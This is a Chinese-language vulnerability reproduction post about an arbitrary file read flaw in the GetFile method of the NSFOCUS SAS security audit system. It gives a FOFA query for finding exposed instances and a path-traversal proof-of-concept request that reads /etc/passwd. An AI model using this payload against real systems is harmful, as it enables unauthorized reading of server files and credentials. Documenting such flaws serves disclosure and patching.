绿盟sas安全审计系统任意文件读取漏洞

绿盟sas安全审计系统任意文件读取漏洞

  • 一、产品简介
  • 二、漏洞概述
  • 三、影响范围
  • 四、复现环境
    • POC
    • 小龙检测工具:
  • 五、修复建议

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

一、产品简介

绿盟安全审计系统SAS,采用先进的协议识别和智能关联分析技术,对网络数据进行采集、分析和识别,实时动态监测通信内容、网络行为等,对发现的敏感信息传输、违规网络行为实时告警;并全面记录用户上网行为,为调查取证提供依据,满足“151号令”法规要求。

二、漏洞概述

绿盟安全审计系统-堡垒机系列 提供一套先进的运维安全管控与审计解决方案,绿盟堡垒机GetFile方法存在任意文件读取漏洞,攻击者通过漏洞可以读取服务器中的任意文件。

三、影响范围

绿盟安全审计系统SAS

绿盟sas安全审计系统任意文件读取漏洞_第1张图片

四、复现环境

FOFA语法:title=“NSFOCUS SAS[H]”

POC

webconf/GetFile/index?path=…/…/…/…/…/…/…/…/…/…/…/…/…/…/etc/passwd

绿盟sas安全审计系统任意文件读取漏洞_第2张图片

小龙检测工具:

绿盟sas安全审计系统任意文件读取漏洞_第3张图片

五、修复建议

请关注厂商的修复版本,并及时更新到最新版本.

你可能感兴趣的:(2023年HW专题,网络安全漏洞复现,网络安全,python)